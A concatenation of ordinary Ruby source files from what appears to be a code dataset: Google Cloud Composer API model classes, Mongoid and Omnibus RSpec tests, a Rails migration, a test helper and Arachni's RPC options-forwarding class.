@node_count = args[:node_count] if args.key?(:node_count)
@private_environment_config = args[:private_environment_config] if args.key?(:private_environment_config)
@software_config = args[:software_config] if args.key?(:software_config)
@web_server_config = args[:web_server_config] if args.key?(:web_server_config)
@web_server_network_access_control = args[:web_server_network_access_control] if args.key?(:web_server_network_access_control)
end
end
# Configuration for controlling how IPs are allocated in the GKE cluster.
class IpAllocationPolicy
include Google::Apis::Core::Hashable
# Optional. The IP address range used to allocate IP addresses to pods in the
# cluster. This field is applicable only when `use_ip_aliases` is true. Set to
# blank to have GKE choose a range with the default size. Set to /netmask (e.g. `
# /14`) to have GKE choose a range with a specific netmask. Set to a [CIDR](http:
# //en.wikipedia.org/wiki/Classless_Inter-Domain_Routing) notation (e.g. `10.96.
# 0.0/14`) from the RFC-1918 private networks (e.g. `10.0.0.0/8`, `172.16.0.0/12`
# , `192.168.0.0/16`) to pick a specific range to use. Specify `
# cluster_secondary_range_name` or `cluster_ipv4_cidr_block` but not both.
# Corresponds to the JSON property `clusterIpv4CidrBlock`
# @return [String]
attr_accessor :cluster_ipv4_cidr_block
# Optional. The name of the cluster's secondary range used to allocate IP
# addresses to pods. Specify either `cluster_secondary_range_name` or `
# cluster_ipv4_cidr_block` but not both. This field is applicable only when `
# use_ip_aliases` is true.
# Corresponds to the JSON property `clusterSecondaryRangeName`
# @return [String]
attr_accessor :cluster_secondary_range_name
# Optional. The IP address range of the services IP addresses in this cluster.
# This field is applicable only when `use_ip_aliases` is true. Set to blank to
# have GKE choose a range with the default size. Set to /netmask (e.g. `/14`) to
# have GKE choose a range with a specific netmask. Set to a [CIDR](http://en.
# wikipedia.org/wiki/Classless_Inter-Domain_Routing) notation (e.g. `10.96.0.0/
# 14`) from the RFC-1918 private networks (e.g. `10.0.0.0/8`, `172.16.0.0/12`, `
# 192.168.0.0/16`) to pick a specific range to use. Specify `
# services_secondary_range_name` or `services_ipv4_cidr_block` but not both.
# Corresponds to the JSON property `servicesIpv4CidrBlock`
# @return [String]
attr_accessor :services_ipv4_cidr_block
# Optional. The name of the services' secondary range used to allocate IP
# addresses to the cluster. Specify either `services_secondary_range_name` or `
# services_ipv4_cidr_block` but not both. This field is applicable only when `
# use_ip_aliases` is true.
# Corresponds to the JSON property `servicesSecondaryRangeName`
# @return [String]
attr_accessor :services_secondary_range_name
# Optional. Whether or not to enable Alias IPs in the GKE cluster. If `true`, a
# VPC-native cluster is created.
# Corresponds to the JSON property `useIpAliases`
# @return [Boolean]
attr_accessor :use_ip_aliases
alias_method :use_ip_aliases?, :use_ip_aliases
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@cluster_ipv4_cidr_block = args[:cluster_ipv4_cidr_block] if args.key?(:cluster_ipv4_cidr_block)
@cluster_secondary_range_name = args[:cluster_secondary_range_name] if args.key?(:cluster_secondary_range_name)
@services_ipv4_cidr_block = args[:services_ipv4_cidr_block] if args.key?(:services_ipv4_cidr_block)
@services_secondary_range_name = args[:services_secondary_range_name] if args.key?(:services_secondary_range_name)
@use_ip_aliases = args[:use_ip_aliases] if args.key?(:use_ip_aliases)
end
end
# Image Version information
class ImageVersion
include Google::Apis::Core::Hashable
# Whether it is impossible to create an environment with the image version.
# Corresponds to the JSON property `creationDisabled`
# @return [Boolean]
attr_accessor :creation_disabled
alias_method :creation_disabled?, :creation_disabled
# The string identifier of the ImageVersion, in the form: "composer-x.y.z-
# airflow-a.b(.c)"
# Corresponds to the JSON property `imageVersionId`
# @return [String]
attr_accessor :image_version_id
# Whether this is the default ImageVersion used by Composer during environment
# creation if no input ImageVersion is specified.
# Corresponds to the JSON property `isDefault`
# @return [Boolean]
attr_accessor :is_default
alias_method :is_default?, :is_default
# Represents a whole or partial calendar date, such as a birthday. The time of
# day and time zone are either specified elsewhere or are insignificant. The
# date is relative to the Gregorian Calendar. This can represent one of the
# following: * A full date, with non-zero year, month, and day values * A month
# and day value, with a zero year, such as an anniversary * A year on its own,
# with zero month and day values * A year and month value, with a zero day, such
# as a credit card expiration date Related types are google.type.TimeOfDay and `
# google.protobuf.Timestamp`.
# Corresponds to the JSON property `releaseDate`
# @return [Google::Apis::ComposerV1beta1::Date]
attr_accessor :release_date
# supported python versions
# Corresponds to the JSON property `supportedPythonVersions`
# @return [Array<String>]
attr_accessor :supported_python_versions
# Whether it is impossible to upgrade an environment running with the image
# version.
# Corresponds to the JSON property `upgradeDisabled`
# @return [Boolean]
attr_accessor :upgrade_disabled
alias_method :upgrade_disabled?, :upgrade_disabled
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@creation_disabled = args[:creation_disabled] if args.key?(:creation_disabled)
@image_version_id = args[:image_version_id] if args.key?(:image_version_id)
@is_default = args[:is_default] if args.key?(:is_default)
@release_date = args[:release_date] if args.key?(:release_date)
@supported_python_versions = args[:supported_python_versions] if args.key?(:supported_python_versions)
@upgrade_disabled = args[:upgrade_disabled] if args.key?(:upgrade_disabled)
end
end
# The environments in a project and location.
class ListEnvironmentsResponse
include Google::Apis::Core::Hashable
# The list of environments returned by a ListEnvironmentsRequest.
# Corresponds to the JSON property `environments`
# @return [Array<Google::Apis::ComposerV1beta1::Environment>]
attr_accessor :environments
# The page token used to query for the next page if one exists.
# Corresponds to the JSON property `nextPageToken`
# @return [String]
attr_accessor :next_page_token
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@environments = args[:environments] if args.key?(:environments)
@next_page_token = args[:next_page_token] if args.key?(:next_page_token)
end
end
# The ImageVersions in a project and location.
class ListImageVersionsResponse
include Google::Apis::Core::Hashable
# The list of supported ImageVersions in a location.
# Corresponds to the JSON property `imageVersions`
# @return [Array<Google::Apis::ComposerV1beta1::ImageVersion>]
attr_accessor :image_versions
# The page token used to query for the next page if one exists.
# Corresponds to the JSON property `nextPageToken`
# @return [String]
attr_accessor :next_page_token
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@image_versions = args[:image_versions] if args.key?(:image_versions)
@next_page_token = args[:next_page_token] if args.key?(:next_page_token)
end
end
# The response message for Operations.ListOperations.
class ListOperationsResponse
include Google::Apis::Core::Hashable
# The standard List next-page token.
# Corresponds to the JSON property `nextPageToken`
# @return [String]
attr_accessor :next_page_token
# A list of operations that matches the specified filter in the request.
# Corresponds to the JSON property `operations`
# @return [Array<Google::Apis::ComposerV1beta1::Operation>]
attr_accessor :operations
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@next_page_token = args[:next_page_token] if args.key?(:next_page_token)
@operations = args[:operations] if args.key?(:operations)
end
end
# The configuration settings for Cloud Composer maintenance window. The
# following example: ` "startTime":"2019-08-01T01:00:00Z" "endTime":"2019-08-
# 01T07:00:00Z" "recurrence":"FREQ=WEEKLY;BYDAY=TU,WE" ` would define a
# maintenance window between 01 and 07 hours UTC during each Tuesday and
# Wednesday.
class MaintenanceWindow
include Google::Apis::Core::Hashable
# Required. Maintenance window end time. It is used only to calculate the
# duration of the maintenance window. The value for end_time must be in the
# future, relative to `start_time`.
# Corresponds to the JSON property `endTime`
# @return [String]
attr_accessor :end_time
# Required. Maintenance window recurrence. Format is a subset of [RFC-5545](
# https://tools.ietf.org/html/rfc5545) `RRULE`. The only allowed values for `
# FREQ` field are `FREQ=DAILY` and `FREQ=WEEKLY;BYDAY=...` Example values: `FREQ=
# WEEKLY;BYDAY=TU,WE`, `FREQ=DAILY`.
# Corresponds to the JSON property `recurrence`
# @return [String]
attr_accessor :recurrence
# Required. Start time of the first recurrence of the maintenance window.
# Corresponds to the JSON property `startTime`
# @return [String]
attr_accessor :start_time
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@end_time = args[:end_time] if args.key?(:end_time)
@recurrence = args[:recurrence] if args.key?(:recurrence)
@start_time = args[:start_time] if args.key?(:start_time)
end
end
# The configuration information for the Kubernetes Engine nodes running the
# Apache Airflow software.
class NodeConfig
include Google::Apis::Core::Hashable
# Optional. The disk size in GB used for node VMs. Minimum size is 20GB. If
# unspecified, defaults to 100GB. Cannot be updated.
# Corresponds to the JSON property `diskSizeGb`
# @return [Fixnum]
attr_accessor :disk_size_gb
# Configuration for controlling how IPs are allocated in the GKE cluster.
# Corresponds to the JSON property `ipAllocationPolicy`
# @return [Google::Apis::ComposerV1beta1::IpAllocationPolicy]
attr_accessor :ip_allocation_policy
# Optional. The Compute Engine [zone](/compute/docs/regions-zones) in which to
# deploy the VMs used to run the Apache Airflow software, specified as a [
# relative resource name](/apis/design/resource_names#relative_resource_name).
# For example: "projects/`projectId`/zones/`zoneId`". This `location` must
# belong to the enclosing environment's project and location. If both this field
# and `nodeConfig.machineType` are specified, `nodeConfig.machineType` must
# belong to this `location`; if both are unspecified, the service will pick a
# zone in the Compute Engine region corresponding to the Cloud Composer location,
# and propagate that choice to both fields. If only one field (`location` or `
# nodeConfig.machineType`) is specified, the location information from the
# specified field will be propagated to the unspecified field.
# Corresponds to the JSON property `location`
# @return [String]
attr_accessor :location
# Optional. The Compute Engine [machine type](/compute/docs/machine-types) used
# for cluster instances, specified as a [relative resource name](/apis/design/
# resource_names#relative_resource_name). For example: "projects/`projectId`/
# zones/`zoneId`/machineTypes/`machineTypeId`". The `machineType` must belong to
# the enclosing environment's project and location. If both this field and `
# nodeConfig.location` are specified, this `machineType` must belong to the `
# nodeConfig.location`; if both are unspecified, the service will pick a zone in
# the Compute Engine region corresponding to the Cloud Composer location, and
# propagate that choice to both fields. If exactly one of this field and `
# nodeConfig.location` is specified, the location information from the specified
# field will be propagated to the unspecified field. The `machineTypeId` must
# not be a [shared-core machine type](/compute/docs/machine-types#sharedcore).
# If this field is unspecified, the `machineTypeId` defaults to "n1-standard-1".
# Corresponds to the JSON property `machineType`
# @return [String]
attr_accessor :machine_type
# Optional. The maximum number of pods per node in the Cloud Composer GKE
# cluster. The value must be between 8 and 110 and it can be set only if the
# environment is VPC-native. The default value is 32. Values of this field will
# be propagated both to the `default-pool` node pool of the newly created GKE
# cluster, and to the default "Maximum Pods per Node" value which is used for
# newly created node pools if their value is not explicitly set during node pool
# creation. For more information, see [Optimizing IP address allocation] (https:/
# /cloud.google.com/kubernetes-engine/docs/how-to/flexible-pod-cidr). Cannot be
# updated.
# Corresponds to the JSON property `maxPodsPerNode`
# @return [Fixnum]
attr_accessor :max_pods_per_node
# Optional. The Compute Engine network to be used for machine communications,
# specified as a [relative resource name](/apis/design/resource_names#
# relative_resource_name). For example: "projects/`projectId`/global/networks/`
# networkId`". If unspecified, the default network in the environment's project
# is used. If a [Custom Subnet Network](/vpc/docs/vpc#vpc_networks_and_subnets)
# is provided, `nodeConfig.subnetwork` must also be provided. For [Shared VPC](/
# vpc/docs/shared-vpc) subnetwork requirements, see `nodeConfig.subnetwork`.
# Corresponds to the JSON property `network`
# @return [String]
attr_accessor :network
# Optional. The set of Google API scopes to be made available on all node VMs.
# If `oauth_scopes` is empty, defaults to ["https://www.googleapis.com/auth/
# cloud-platform"]. Cannot be updated.
# Corresponds to the JSON property `oauthScopes`
# @return [Array<String>]
attr_accessor :oauth_scopes
# Optional. The Google Cloud Platform Service Account to be used by the node VMs.
# If a service account is not specified, the "default" Compute Engine service
# account is used. Cannot be updated.
# Corresponds to the JSON property `serviceAccount`
# @return [String]
attr_accessor :service_account
# Optional. The Compute Engine subnetwork to be used for machine communications,
# specified as a [relative resource name](/apis/design/resource_names#
# relative_resource_name). For example: "projects/`projectId`/regions/`regionId`/
# subnetworks/`subnetworkId`" If a subnetwork is provided, `nodeConfig.network`
# must also be provided, and the subnetwork must belong to the enclosing
# environment's project and location.
# Corresponds to the JSON property `subnetwork`
# @return [String]
attr_accessor :subnetwork
# Optional. The list of instance tags applied to all node VMs. Tags are used to
# identify valid sources or targets for network firewalls. Each tag within the
# list must comply with [RFC1035](https://www.ietf.org/rfc/rfc1035.txt). Cannot
# be updated.
# Corresponds to the JSON property `tags`
# @return [Array<String>]
attr_accessor :tags
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@disk_size_gb = args[:disk_size_gb] if args.key?(:disk_size_gb)
@ip_allocation_policy = args[:ip_allocation_policy] if args.key?(:ip_allocation_policy)
@location = args[:location] if args.key?(:location)
@machine_type = args[:machine_type] if args.key?(:machine_type)
@max_pods_per_node = args[:max_pods_per_node] if args.key?(:max_pods_per_node)
@network = args[:network] if args.key?(:network)
@oauth_scopes = args[:oauth_scopes] if args.key?(:oauth_scopes)
@service_account = args[:service_account] if args.key?(:service_account)
@subnetwork = args[:subnetwork] if args.key?(:subnetwork)
@tags = args[:tags] if args.key?(:tags)
end
end
# This resource represents a long-running operation that is the result of a
# network API call.
class Operation
include Google::Apis::Core::Hashable
# If the value is `false`, it means the operation is still in progress. If `true`
# , the operation is completed, and either `error` or `response` is available.
# Corresponds to the JSON property `done`
# @return [Boolean]
attr_accessor :done
alias_method :done?, :done
# The `Status` type defines a logical error model that is suitable for different
# programming environments, including REST APIs and RPC APIs. It is used by [
# gRPC](https://github.com/grpc). Each `Status` message contains three pieces of
# data: error code, error message, and error details. You can find out more
# about this error model and how to work with it in the [API Design Guide](https:
# //cloud.google.com/apis/design/errors).
# Corresponds to the JSON property `error`
# @return [Google::Apis::ComposerV1beta1::Status]
attr_accessor :error
# Service-specific metadata associated with the operation. It typically contains
# progress information and common metadata such as create time. Some services
# might not provide such metadata. Any method that returns a long-running
# operation should document the metadata type, if any.
# Corresponds to the JSON property `metadata`
# @return [Hash<String,Object>]
attr_accessor :metadata
# The server-assigned name, which is only unique within the same service that
# originally returns it. If you use the default HTTP mapping, the `name` should
# be a resource name ending with `operations/`unique_id``.
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
# The normal response of the operation in case of success. If the original
# method returns no data on success, such as `Delete`, the response is `google.
# protobuf.Empty`. If the original method is standard `Get`/`Create`/`Update`,
# the response should be the resource. For other methods, the response should
# have the type `XxxResponse`, where `Xxx` is the original method name. For
# example, if the original method name is `TakeSnapshot()`, the inferred
# response type is `TakeSnapshotResponse`.
# Corresponds to the JSON property `response`
# @return [Hash<String,Object>]
attr_accessor :response
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@done = args[:done] if args.key?(:done)
@error = args[:error] if args.key?(:error)
@metadata = args[:metadata] if args.key?(:metadata)
@name = args[:name] if args.key?(:name)
@response = args[:response] if args.key?(:response)
end
end
# Metadata describing an operation.
class OperationMetadata
include Google::Apis::Core::Hashable
# Output only. The time the operation was submitted to the server.
# Corresponds to the JSON property `createTime`
# @return [String]
attr_accessor :create_time
# Output only. The time when the operation terminated, regardless of its success.
# This field is unset if the operation is still ongoing.
# Corresponds to the JSON property `endTime`
# @return [String]
attr_accessor :end_time
# Output only. The type of operation being performed.
# Corresponds to the JSON property `operationType`
# @return [String]
attr_accessor :operation_type
# Output only. The resource being operated on, as a [relative resource name]( /
# apis/design/resource_names#relative_resource_name).
# Corresponds to the JSON property `resource`
# @return [String]
attr_accessor :resource
# Output only. The UUID of the resource being operated on.
# Corresponds to the JSON property `resourceUuid`
# @return [String]
attr_accessor :resource_uuid
# Output only. The current operation state.
# Corresponds to the JSON property `state`
# @return [String]
attr_accessor :state
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@create_time = args[:create_time] if args.key?(:create_time)
@end_time = args[:end_time] if args.key?(:end_time)
@operation_type = args[:operation_type] if args.key?(:operation_type)
@resource = args[:resource] if args.key?(:resource)
@resource_uuid = args[:resource_uuid] if args.key?(:resource_uuid)
@state = args[:state] if args.key?(:state)
end
end
# Configuration options for the private GKE cluster in a Cloud Composer
# environment.
class PrivateClusterConfig
include Google::Apis::Core::Hashable
# Optional. If `true`, access to the public endpoint of the GKE cluster is
# denied.
# Corresponds to the JSON property `enablePrivateEndpoint`
# @return [Boolean]
attr_accessor :enable_private_endpoint
alias_method :enable_private_endpoint?, :enable_private_endpoint
# Optional. The CIDR block from which IPv4 range for GKE master will be reserved.
# If left blank, the default value of '172.16.0.0/23' is used.
# Corresponds to the JSON property `masterIpv4CidrBlock`
# @return [String]
attr_accessor :master_ipv4_cidr_block
# Output only. The IP range in CIDR notation to use for the hosted master
# network. This range is used for assigning internal IP addresses to the cluster
# master or set of masters and to the internal load balancer virtual IP. This
# range must not overlap with any other ranges in use within the cluster's
# network.
# Corresponds to the JSON property `masterIpv4ReservedRange`
# @return [String]
attr_accessor :master_ipv4_reserved_range
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@enable_private_endpoint = args[:enable_private_endpoint] if args.key?(:enable_private_endpoint)
@master_ipv4_cidr_block = args[:master_ipv4_cidr_block] if args.key?(:master_ipv4_cidr_block)
@master_ipv4_reserved_range = args[:master_ipv4_reserved_range] if args.key?(:master_ipv4_reserved_range)
end
end
# The configuration information for configuring a Private IP Cloud Composer
# environment.
class PrivateEnvironmentConfig
include Google::Apis::Core::Hashable
# Optional. The CIDR block from which IP range in tenant project will be
# reserved for Cloud SQL. Needs to be disjoint from web_server_ipv4_cidr_block
# Corresponds to the JSON property `cloudSqlIpv4CidrBlock`
# @return [String]
attr_accessor :cloud_sql_ipv4_cidr_block
# Optional. If `true`, a Private IP Cloud Composer environment is created. If
# this field is set to true, `IPAllocationPolicy.use_ip_aliases` must be set to
# true.
# Corresponds to the JSON property `enablePrivateEnvironment`
# @return [Boolean]
attr_accessor :enable_private_environment
alias_method :enable_private_environment?, :enable_private_environment
# Configuration options for the private GKE cluster in a Cloud Composer
# environment.
# Corresponds to the JSON property `privateClusterConfig`
# @return [Google::Apis::ComposerV1beta1::PrivateClusterConfig]
attr_accessor :private_cluster_config
# Optional. The CIDR block from which IP range for web server will be reserved.
# Needs to be disjoint from private_cluster_config.master_ipv4_cidr_block and
# cloud_sql_ipv4_cidr_block.
# Corresponds to the JSON property `webServerIpv4CidrBlock`
# @return [String]
attr_accessor :web_server_ipv4_cidr_block
# Output only. The IP range reserved for the tenant project's App Engine VMs.
# Corresponds to the JSON property `webServerIpv4ReservedRange`
# @return [String]
attr_accessor :web_server_ipv4_reserved_range
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@cloud_sql_ipv4_cidr_block = args[:cloud_sql_ipv4_cidr_block] if args.key?(:cloud_sql_ipv4_cidr_block)
@enable_private_environment = args[:enable_private_environment] if args.key?(:enable_private_environment)
@private_cluster_config = args[:private_cluster_config] if args.key?(:private_cluster_config)
@web_server_ipv4_cidr_block = args[:web_server_ipv4_cidr_block] if args.key?(:web_server_ipv4_cidr_block)
@web_server_ipv4_reserved_range = args[:web_server_ipv4_reserved_range] if args.key?(:web_server_ipv4_reserved_range)
end
end
# Restart Airflow web server.
class RestartWebServerRequest
include Google::Apis::Core::Hashable
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
end
end
# Specifies the selection and configuration of software inside the environment.
class SoftwareConfig
include Google::Apis::Core::Hashable
# Optional. Apache Airflow configuration properties to override. Property keys
# contain the section and property names, separated by a hyphen, for example "
# core-dags_are_paused_at_creation". Section names must not contain hyphens ("-")
# , opening square brackets ("["), or closing square brackets ("]"). The
# property name must not be empty and must not contain an equals sign ("=") or
# semicolon (";"). Section and property names must not contain a period (".").
# Apache Airflow configuration property names must be written in [snake_case](
# https://en.wikipedia.org/wiki/Snake_case). Property values can contain any
# character, and can be written in any lower/upper case format. Certain Apache
# Airflow configuration property values are [blocked](/composer/docs/concepts/
# airflow-configurations), and cannot be overridden.
# Corresponds to the JSON property `airflowConfigOverrides`
# @return [Hash<String,String>]
attr_accessor :airflow_config_overrides
# Optional. Additional environment variables to provide to the Apache Airflow
# scheduler, worker, and webserver processes. Environment variable names must
# match the regular expression `a-zA-Z_*`. They cannot specify Apache Airflow
# software configuration overrides (they cannot match the regular expression `
# AIRFLOW__[A-Z0-9_]+__[A-Z0-9_]+`), and they cannot match any of the following
# reserved names: * `AIRFLOW_HOME` * `C_FORCE_ROOT` * `CONTAINER_NAME` * `
# DAGS_FOLDER` * `GCP_PROJECT` * `GCS_BUCKET` * `GKE_CLUSTER_NAME` * `
# SQL_DATABASE` * `SQL_INSTANCE` * `SQL_PASSWORD` * `SQL_PROJECT` * `SQL_REGION`
# * `SQL_USER`
# Corresponds to the JSON property `envVariables`
# @return [Hash<String,String>]
attr_accessor :env_variables
# The version of the software running in the environment. This encapsulates both
# the version of Cloud Composer functionality and the version of Apache Airflow.
# It must match the regular expression `composer-([0-9]+\.[0-9]+\.[0-9]+|latest)-
# airflow-[0-9]+\.[0-9]+(\.[0-9]+.*)?`. When used as input, the server also
# checks if the provided version is supported and denies the request for an
# unsupported version. The Cloud Composer portion of the version is a [semantic
# version](https://semver.org) or `latest`. When the patch version is omitted,
# the current Cloud Composer patch version is selected. When `latest` is
# provided instead of an explicit version number, the server replaces `latest`
# with the current Cloud Composer version and stores that version number in the
# same field. The portion of the image version that follows *airflow-* is an
# official Apache Airflow repository [release name](https://github.com/apache/
# incubator-airflow/releases). See also [Version List](/composer/docs/concepts/
# versioning/composer-versions).
# Corresponds to the JSON property `imageVersion`
# @return [String]
attr_accessor :image_version
# Optional. Custom Python Package Index (PyPI) packages to be installed in the
# environment. Keys refer to the lowercase package name such as "numpy" and
# values are the lowercase extras and version specifier such as "==1.12.0", "[
# devel,gcp_api]", or "[devel]>=1.8.2, <1.9.2". To specify a package without
# pinning it to a version specifier, use the empty string as the value.
# Corresponds to the JSON property `pypiPackages`
# @return [Hash<String,String>]
attr_accessor :pypi_packages
# Optional. The major version of Python used to run the Apache Airflow scheduler,
# worker, and webserver processes. Can be set to '2' or '3'. If not specified,
# the default is '2'. Cannot be updated.
# Corresponds to the JSON property `pythonVersion`
# @return [String]
attr_accessor :python_version
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@airflow_config_overrides = args[:airflow_config_overrides] if args.key?(:airflow_config_overrides)
@env_variables = args[:env_variables] if args.key?(:env_variables)
@image_version = args[:image_version] if args.key?(:image_version)
@pypi_packages = args[:pypi_packages] if args.key?(:pypi_packages)
@python_version = args[:python_version] if args.key?(:python_version)
end
end
# The `Status` type defines a logical error model that is suitable for different
# programming environments, including REST APIs and RPC APIs. It is used by [
# gRPC](https://github.com/grpc). Each `Status` message contains three pieces of
# data: error code, error message, and error details. You can find out more
# about this error model and how to work with it in the [API Design Guide](https:
# //cloud.google.com/apis/design/errors).
class Status
include Google::Apis::Core::Hashable
# The status code, which should be an enum value of google.rpc.Code.
# Corresponds to the JSON property `code`
# @return [Fixnum]
attr_accessor :code
# A list of messages that carry the error details. There is a common set of
# message types for APIs to use.
# Corresponds to the JSON property `details`
# @return [Array<Hash<String,Object>>]
attr_accessor :details
# A developer-facing error message, which should be in English. Any user-facing
# error message should be localized and sent in the google.rpc.Status.details
# field, or localized by the client.
# Corresponds to the JSON property `message`
# @return [String]
attr_accessor :message
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@code = args[:code] if args.key?(:code)
@details = args[:details] if args.key?(:details)
@message = args[:message] if args.key?(:message)
end
end
# The configuration settings for the Airflow web server App Engine instance.
class WebServerConfig
include Google::Apis::Core::Hashable
# Optional. Machine type on which Airflow web server is running. It has to be
# one of: composer-n1-webserver-2, composer-n1-webserver-4 or composer-n1-
# webserver-8. If not specified, composer-n1-webserver-2 will be used. Value
# custom is returned only in response, if Airflow web server parameters were
# manually changed to a non-standard values.
# Corresponds to the JSON property `machineType`
# @return [String]
attr_accessor :machine_type
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@machine_type = args[:machine_type] if args.key?(:machine_type)
end
end
# Network-level access control policy for the Airflow web server.
class WebServerNetworkAccessControl
include Google::Apis::Core::Hashable
# A collection of allowed IP ranges with descriptions.
# Corresponds to the JSON property `allowedIpRanges`
# @return [Array<Google::Apis::ComposerV1beta1::AllowedIpRange>]
attr_accessor :allowed_ip_ranges
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@allowed_ip_ranges = args[:allowed_ip_ranges] if args.key?(:allowed_ip_ranges)
end
end
end
end
end
| 47.362264 | 136 | 0.650725 |
91b2e79155d00126880da9cab64d7b802da9c50a | 215 | # frozen_string_literal: true
ActiveRecord::Schema.define do
create_enum :shirt_size, %w[small medium large]
create_table :shirts do |t|
t.string :name
t.enum :size, enum_type: :shirt_size
end
end
| 19.545455 | 49 | 0.72093 |
79a04cf64b9222e969148427e8f9946bdcc86fae | 2,744 | require 'spec_helper'
module Omnibus
describe ManifestDiff do
def manifest_entry_for(name, dv, lv)
Omnibus::ManifestEntry.new(name, {:described_version => dv,
:locked_version => lv,
:locked_source => {
:git => "git://#{name}@example.com"},
:source_type => :git
})
end
let(:manifest_one) do
m = Omnibus::Manifest.new()
m.add("foo", manifest_entry_for("foo", "1.2.4", "deadbeef"))
m.add("bar", manifest_entry_for("bar", "1.2.4", "deadbeef"))
m
end
let(:manifest_two) do
m = Omnibus::Manifest.new()
m.add("foo", manifest_entry_for("foo", "1.2.5", "deadbea0"))
m.add("baz", manifest_entry_for("baz", "1.2.4", "deadbeef"))
m
end
subject { described_class.new(manifest_one, manifest_two)}
describe "#updated" do
it "returns items that existed in the first manifest but have been changed" do
expect(subject.updated).to eq([{ :name => "foo",
:old_version => "deadbeef",
:new_version => "deadbea0",
:source_type => :git,
:source => {:git => "git://[email protected]"}
}])
end
describe "#removed" do
it "returns items that existed in the first manfiest but don't exist in the second" do
expect(subject.removed).to eq([{ :name => "bar",
:old_version => "deadbeef",
:source_type => :git,
:source => {:git => "git://[email protected]"}
}])
end
end
describe "#added" do
it "returns items that did not exist in the first manifest but do exist in the second" do
expect(subject.added).to eq([{ :name => "baz",
:new_version => "deadbeef",
:source_type => :git,
:source => {:git => "git://[email protected]"}
}])
end
end
describe "#empty?" do
it "returns false if there have been changes" do
expect(subject.empty?).to eq(false)
end
it "returns true if nothing changed" do
diff = Omnibus::ManifestDiff.new(manifest_one, manifest_one)
expect(diff.empty?).to eq(true)
end
end
end
end
end
| 37.081081 | 97 | 0.448251 |
6182200c855bce91919b07c6a0915616fddd20a6 | 1,295 | # frozen_string_literal: true
require "spec_helper"
describe Mongoid::Matchable::Regexp do
let(:matcher) do
described_class.new(attribute)
end
let(:attribute) do
'Emily'
end
describe '#_matches?' do
context 'when a BSON::Regexp::Raw object is passed' do
let(:regexp) do
BSON::Regexp::Raw.new('^Em')
end
it 'compiles the regexp object to a native regexp for the matching' do
expect(matcher._matches?(regexp)).to be(true)
end
context 'when the value does not match the attribute' do
let(:attribute) do
'ily'
end
it 'compiles the regexp object to a native regexp for the matching' do
expect(matcher._matches?(regexp)).to be(false)
end
end
end
context 'when a native Regexp object is passed' do
let(:regexp) do
/^Em/
end
it 'calls super with the native regexp' do
expect(matcher._matches?(regexp)).to be(true)
end
context 'when the value does not match the attribute' do
let(:attribute) do
'ily'
end
it 'compiles the regexp object to a native regexp for the matching' do
expect(matcher._matches?(regexp)).to be(false)
end
end
end
end
end
| 20.887097 | 78 | 0.609266 |
218dab2d72a2b24f2c72ef55a49300bf6cdca15a | 372 | class AddMsgParametersToProviderAccounts < ActiveRecord::Migration
def self.up
add_column :provider_accounts, :msg_account_id, :string
add_column :provider_accounts, :auto_lock_instances, :boolean, :default => false
end
def self.down
remove_column :provider_accounts, :msg_account_id
remove_column :provider_accounts, :auto_lock_instances
end
end
| 31 | 84 | 0.790323 |
91312dd1e9b849f9aca9337f8fcec7d87fd46910 | 77 | module Cmor::Rbac
class RolePolicy # < Itsf::Backend::BasePolicy
end
end
| 15.4 | 48 | 0.727273 |
330f778f6089b6a806c2fd1614537396ddae26f2 | 561 | require 'fileutils'
require 'test/unit'
module Multiverse
ROOT = File.expand_path(File.join(File.dirname(__FILE__), '..', '..'))
$: << File.expand_path(File.join(ROOT, 'lib'))
# Include from our unit testing path to share fake_collector and fake_service
$: << File.expand_path(File.join(ROOT, '..', 'new_relic'))
SUITES_DIRECTORY = ENV['SUITES_DIRECTORY'] || File.join(ROOT, '/suites')
require 'multiverse/color'
require 'multiverse/output_collector'
require 'multiverse/runner'
require 'multiverse/envfile'
require 'multiverse/suite'
end
| 33 | 79 | 0.720143 |
f737f7b289c7359e787c116b6784002c98892cf1 | 2,373 | =begin
Copyright 2010-2014 Tasos Laskos <[email protected]>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=end
module Arachni
module RPC
class Server
#
# It, for the most part, forwards calls to {::Arachni::Options} and intercepts
# a few that need to be updated at other places throughout the framework.
#
# @author Tasos "Zapotek" Laskos <[email protected]>
#
class ActiveOptions
def initialize( framework )
@opts = framework.opts
%w( url http_req_limit http_timeout user_agent redirect_limit proxy_username
proxy_password proxy_type proxy_host proxy_port authed_by cookies
cookie_string http_username http_password ).each do |m|
m = "#{m}=".to_sym
self.class.class_eval do
define_method m do |v|
@opts.send( m, v )
HTTP.reset false
v
end
end
end
(@opts.public_methods( false ) - public_methods( false ) ).each do |m|
self.class.class_eval do
define_method m do |*args|
@opts.send( m, *args )
end
end
end
end
# @see Arachni::Options#set
def set( options )
options.each do |k, v|
begin
send( "#{k.to_s}=", v )
rescue => e
#ap e
#ap e.backtrace
end
end
HTTP.reset false
true
end
def proxy=( proxy_url )
@opts.proxy_host, @opts.proxy_port = proxy_url.to_s.split( /:/ )
@opts.proxy_port = @opts.proxy_port.to_i
HTTP.reset false
@opts.proxy = proxy_url
end
def cookie_jar=( cookie_jar )
HTTP.update_cookies( cookie_jar )
@cookie_jar = cookie_jar
end
end
end
end
end
